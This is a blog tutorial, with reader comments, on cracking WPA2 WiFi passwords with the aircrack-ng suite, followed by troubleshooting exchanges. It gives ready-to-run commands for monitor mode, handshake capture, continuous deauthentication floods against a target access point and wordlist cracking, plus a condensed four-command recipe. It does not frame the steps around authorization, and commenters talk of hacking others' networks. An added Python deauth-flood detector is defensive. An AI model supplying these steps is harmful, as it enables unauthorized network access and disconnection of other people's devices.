Cracking WPA2 WiFi password using aircrack-ng Kali Linux

Cracking a WPA2 WiFi password is not really an easy thing to do.
No, you can't crack it with a click, and there is no software that will give you the password without some hard work ...
Don't run away, though: you can still crack it in a few steps here :) and we will do it using aircrack-ng.

Requirements: to crack a WPA2-PSK encrypted WiFi password using aircrack-ng

1- Kali Linux or any Linux system with aircrack-ng installed
  a- if you don't have the aircrack-ng suite, get it with this command in the terminal
sudo apt-get install aircrack-ng
2- a wireless network adapter that supports monitor mode, like
  a- Alfa 2W AWUS036NH
  b- Alfa AWUS036H
  c- wifiy-city 56G
  d- and you can check this page for card compatibility and drivers
3- a word list comprising all the possible different combinations of pass-phrases

Now let's get to work.
I will be using the wifiy-city 56G card on Kali Linux 2 sana.

1) Open up your terminal as root and type
This will show you all the networking interfaces connected to your device.

If your wireless network adapter is working fine you should see "wlan0". The name may change if you have more than one wireless adapter connected.

2) Now, to start monitor mode, type
airmon-ng start wlan0 
'airmon-ng' is a traffic monitoring tool
'wlan0' is your wireless interface
After this command, monitor mode is started.
As can be seen, monitor mode is working under wlan0mon, so this is your card name for now.
The red area shows a list of process IDs that cause trouble during the process, so kill those processes by typing
kill <pid>
In my case
kill 743 898 1070 1071 1081 
Now type ifconfig and this will show the newly set monitoring interface, i.e. wlan0mon. In most cases it will be mon0.

3) To show the list of available WiFi networks, type
airodump-ng wlan0mon

airodump-ng is a WiFi packet capturing tool
wlan0mon is my monitoring interface
airodump-ng will start capturing all packets. From the captured packets,
select your target and note its 'bssid' (bssid = basic service set identifier) and channel,
then stop the capture using Ctrl+C.

4) Start capturing the packets of your target network.
Type the following command
airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon 
i.e.:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon 

This will start the capturing of packets.
If you get the handshake, you won't need the aireplay command...
If you haven't got the handshake yet,
while the capturing of packets goes on, open a new terminal as root and type
aireplay-ng -0 0 -a <bssid> mon0
aireplay-ng = tool for deauthentication, fake authentication and other packet injections,
-0 = number associated with deauthentication,
0 = deauth count,
-a = bssid. Here we are trying to send a deauthentication request.
In my case the command looks like
aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon

After a few seconds stop it using Ctrl+C.
Now we have successfully captured the WPA handshake.
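
The continuous deauthentication in step 4 is also what a defender sees on the air, so here is an added detection example (not part of the original tutorial): it counts deauthentication/disassociation frames per BSSID in a sliding window and flags bursts, noting whether they were sent to the broadcast address. The log format, the window, the threshold and the client and second-AP addresses are assumptions made up for this example; only the BSSID comes from the tutorial.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def constructed_sample():
    """Constructed log lines: '<seconds> <subtype> <source> <destination> <bssid>'."""
    ap = "C0:4A:00:F0:F4:24"       # BSSID used in the tutorial
    other = "02:00:00:00:00:10"    # constructed second AP
    lines = [
        f"5.00 beacon {ap} {BROADCAST} {ap}",
        f"7.50 deauth 02:00:00:00:00:aa {other} {other}",  # one client leaving normally
    ]
    # Burst of 40 broadcast deauth frames, 20 ms apart
    lines += [f"{100 + i * 0.02:.2f} deauth {ap} {BROADCAST} {ap}" for i in range(40)]
    return lines

def parse(line):
    ts, subtype, src, dst, bssid = line.split()
    return float(ts), subtype.lower(), src.lower(), dst.lower(), bssid.lower()

def detect_deauth_floods(lines, window=1.0, threshold=10):
    """Return one alert per BSSID with >= threshold deauth frames inside `window` seconds."""
    recent = defaultdict(deque)    # bssid -> (timestamp, destination) of recent frames
    alerts = {}
    for line in lines:
        if not line.strip():
            continue
        ts, subtype, _src, dst, bssid = parse(line)
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[bssid]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:   # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alert = alerts.setdefault(
                bssid,
                {"bssid": bssid, "first_seen": q[0][0], "peak": 0, "broadcast": False},
            )
            alert["peak"] = max(alert["peak"], len(q))
            alert["broadcast"] = alert["broadcast"] or any(d == BROADCAST for _, d in q)
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_deauth_floods(constructed_sample()):
        print(alert)
```

Where 802.11w Protected Management Frames are required on the network, clients discard these unauthenticated deauthentication frames, so an alert there records an attempt rather than an outage.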

5) Stop the capturing using Ctrl+C and type "ls", which will bring up all the current directories and files.
Select the file with the ".cap" extension and type the following command
aircrack-ng -w <full location of the word list> <name of the file>
aircrack-ng is a tool that helps in cracking the password
In my case the command looks like
aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
For the wordlist, check this post: Best Password dictionary
Now it starts finding a suitable passphrase.

Now all you have to do is wait until you see the lovely news ( KEY Found ( your key is here ;) ).

All steps in a few lines
1) airodump-ng wlan0mon
2) airodump-ng -c 9 -w wifi  --bssid C4:6E:1F:F6:34:B8 wlan0mon
3) aireplay-ng -0 0 -a C4:6E:1F:F6:34:B8 wlan0mon
4) aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap

have a great day :)

Best WiFi adapters to work with Aircrack
Here is a list of wireless cards that support injection and monitor mode
1. Alfa AWUS036NHA – (2.4GHz)
2. TP-LINK TP-WN722N $13.44
3. AWUS036H – (2.4GHz) $26.99
4. TP-Link WN722N (2.4GHz) $18.97
5. D-Link DWA-110

Comments

  1. What is morethan.txt? Tell me please, I have rockyou.text.gz. Are these both the same?

    1. Check this post, I just wrote it. After reading it you will understand everything about rockyou.text.gz and what I meant by morethan8.txt

    2. Hey, my name is demi. I want to become the best government tool {HACKER}, please make me your nick name HAWK)

  2. After entering the last command I get the error "directory doesn't exist". I checked the file and it is under usr/share/wordlists. Am I entering the wrong command?

    1. aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap

      Does your file have the same name as mine ( more_than_8.txt )?

    2. dude you're using an OS bigger than you... start using those easy phone apps for hacking, XlOL..

    3. There is nothing bigger than the human mind in here!
      If he wants to do it, he will learn to do it.

  3. I have googled extensively regarding my wireless card, and followed literally hundreds of step-by-step guides with fw cutter etc. What I'm getting is I can switch to mon mode, I can see my AP and others, I did the aireplay injection test, shows injection is working! BUT! When I try to authenticate on my AP I never actually get any handshake, also I can never see clients I manually connect to my AP. I know I'm close enough because it's my own AP literally a meter away from my machine. It's definitely in monitor mode and I can inject 'so it says'. Just not sure where I'm going wrong. My device is the Broadcom b4312 lpphy rev 01. I blacklisted other drivers etc. and when I use check it says device b43x so assuming it's running the correct driver, and FW cutter didn't show any errors so assuming the firmware has been patched. Spent days and days with this one, any tips would be massively appreciated. Many thanks.

    1. DEAUTH - DOESN'T WORK. Associated clients on my network don't show when I manually connect another machine to my own AP to see if airodump picks it up. I tried to DEAUTH all clients on the AP and nothing. Fake auth doesn't work as I get nothing with open system, and sharedkey shows an error locating the sharedkey file.

    2. I'm sorry, with this problem I can't help because I face the same problem sometimes and couldn't really find a way to fix it yet.

      Some APs give me the handshake and some don't.
      My friend's house is close to mine and I can get his AP's handshake,
      and at the same time I can't get my own AP's handshake and it's closer than his AP.
      I just don't really understand the problem behind this.

  4. Hi bro ..... once you found the keys, how do you use them ..... please tell me bro ....

    1. You put it on your computer like you want to connect to the wifi

  5. Hi bro, I am happy for what you did. I get an error:
    No data - WEP or WPA

    Choosing first network as target

    Opening ******.cap

    Got no data packets from target network

    Quitting aircrack-ng

    1. Can you help me to solve it? Thanks again :)

    2. Maybe it's because I use a DVD in live amd64 mode. I didn't install Kali, I just use it in live mode.

    3. You need to get the handshake again, so start the task all over.

  6. It's been more than 24 mins but it's not showing the handshake. What to do now?? Please help.

    2. Most wifi adapters are made to get signal within your own home. Get a wifi adapter with an RTL8187L chipset such as the Alfa models. They have good range.

  7. Hi bro, the last order aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
    gives me: please specify a dictionary option -w

    1. Change the .cap file name to your .cap file name!
      Change more_than_8.txt to your own dictionary file name!

      If you don't know how to get the dictionary, check this post.

    2. I changed the name and it still tells me to specify a dictionary option. What do I do?

  8. Hi man, I am using a Ralink wireless USB adapter. Am I going to achieve a result?

  9. My file is in home and when I type aircrack-ng -w /home/wifi-01.cap
    I get an error saying the file does not exist. What do I type?

    1. Try the command without /home/

      so it should look like this: aircrack-ng -w wifi-01.cap

    2. Help!! I tried aircrack-ng -w wifi-01.cap
      and got "No file to crack specified".

  10. How about the same tutorial for 2016.1? Because many of us are having issues with packet injection, even with the correct driver/chipset.
    I do not want to install an older version.

    1. Will make one soon, but what about the AP you are targeting: is it N or the old chipset?

  12. Hello. I found this blog after attempting many times to crack my own WiFi access point. I'm using an Alfa AWUS036NH USB adapter, running a Kali VM on Ubuntu. After trying these steps and other variations of them, I found a command on another site:

    aireplay-ng -9 wlan0mon

    I read that it's supposed to test if packet injection is supported by my adapter. But I'm wondering if it really is to test if any Access Points it finds are able to be packet injected. Does anyone know? The response to this command was something to the effect of:

    No Answer...
    Found 0 APs

    Can anyone clarify? Thanks in advance!

    1. aireplay-ng is a tool for deauthentication.
      What it really does is disconnect all users from the AP, and then when they reconnect you start capturing the packets.

    3. Thanks for your response.

      So that command does not do what I thought it did? Because it did not disconnect all users from the AP either. It looked like it was searching for APs and didn't find any. Basically I can't get this tutorial (or any other variation that I've found online) to work for deauthentication or capturing packets. I've tried my AP and several others that get a decent signal.

      Could it just be the case that all APs within my range are protected against this type of attack?

    4. The command aireplay-ng should disconnect all users from the AP...
      In your case I'm not sure what the problem is...
      But what's the wifi adapter you are using? Name it.

    5. Walid- As I said in my original question I'm using the Alfa AWUS036NH USB adapter. This adapter was recommended by the initial resource I was looking at for cracking WiFi, so I'm thinking it should have the necessary capabilities. Thanks.

    6. Oh, I'm sorry, I forgot it's an Alfa AWUS036NH...
      Okay, well, as you know this adapter should work fine... Now we have to check the AP, so what's your AP name and version?

    7. No problem. It's an Arris TG1682G. The hardware rev is 9.0

  13. Replies
    1. Great :) what WiFi adapter are you using ?

  14. Hello Walid,

    What adapter should I use?

    1. Hi there, there is a list at the end of the post of adapters that work with this tutorial

      1. Alfa AWUS036NHA – (2.4GHz)
      2. TP-LINK TP-WN722N $13.44
      3. AWUS036H – (2.4GHz) $26.99
      4. TP-Link WN722N (2.4GHz) $18.97

      All of them work fine, but Alfa adapters are the best of the best.

  15. I want to learn to hack please make me your student.

    1. You can learn by reading what I have on this website :)

  16. Hey ....
    My laptop does not do monitor mode. Can I hack a wifi password without monitor mode.....??

    1. No, you can't.
      You need a USB WiFi adapter.

  17. Dude, to hack, we need to be near the AP and a couple of clients of the AP, right? So we can get the handshake? If we only have AP access (because pointing from long distance) we won't be able to hack/crack the password?

  20. Hey bro! I am happy with what you did. Everything was going fine with these commands. But I got a problem after the last command: #aircrack-ng -w /usr/share/wordlists/wifi.txt ***-01.cap
    fopen (directory) failed: No such file or directory
    fopen (directory) failed: No such file or directory
    opening ***-01.cap
    Read 509127 packets.
    xx:xx:xx:xx:xx:xx xyz WPA(1 handshake)

    choose first network as target.
    opening ***-01.cap
    please specify a dictionary (option -w)

    Quitting aircrack-ng.......

    I don't suppose that my cap file has been broken. Am I wrong?? What might be the problem??? And what might be the solution??? Please provide me guidance..

    1. Hi bro,
      I think the problem is here: /usr/share/wordlists/wifi.txt
      Is your password dictionary in that path?

    2. I think, yes, it is the path of my password dictionary. Because when I wrote the command #ls initially it does not show the rockyou.txt file, but when I wrote the #ls command after the execution of the first three commands of the tutorial, i.e. cp /usr/share/wordlists/rockyou.txt.gz . , gunzip rock you.txt.gz and cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > wifi.txt it shows both rockyou.txt and wifi.txt
      I also tried other paths, i.e. Desktop/usr/share/wordlists/wifi.txt
      and Desktop/share/wordlists/wifi.txt
      but I receive the same error.

    3. And yeah, I also tried interchanging the place of -w /usr/share/wordlists/wifi.txt and ***-01.cap but the problem remains the same.

    4. Error message "fopen(dictionary)failed: No such file or directory"
      This means you have misspelt the file name of the dictionary or it is not in the current directory. If the dictionary is located in another directory, you must provide the full path to the dictionary.

    5. Try to change the password dictionary to another name, or try just to check it with rockyou.txt
      aircrack-ng -w /usr/share/wordlists/rockyou.txt wifi-01.cap

  21. Hey walid... I have tried many times but when I aircrack... it shows 'please specify a dictionary (option -w)' even though I specified the 'wifi-01.cap file. So how? Help me please.

    1. When it asks you to specify a dictionary you need to specify a txt file that has a list of passwords to try.

  22. Hello walid... I tried so many times as you posted here.. but when I aircrack it shows 'please specify a dictionary (option -w)' even though I specified the file location. Help me please.

    1. Hi Niethiya
      Please check this newest post about wifi cracking:
      how to hack wifi password

  23. what to do if we get the handshake after 'airodump-ng -c -w --bssid wlan0mon'?
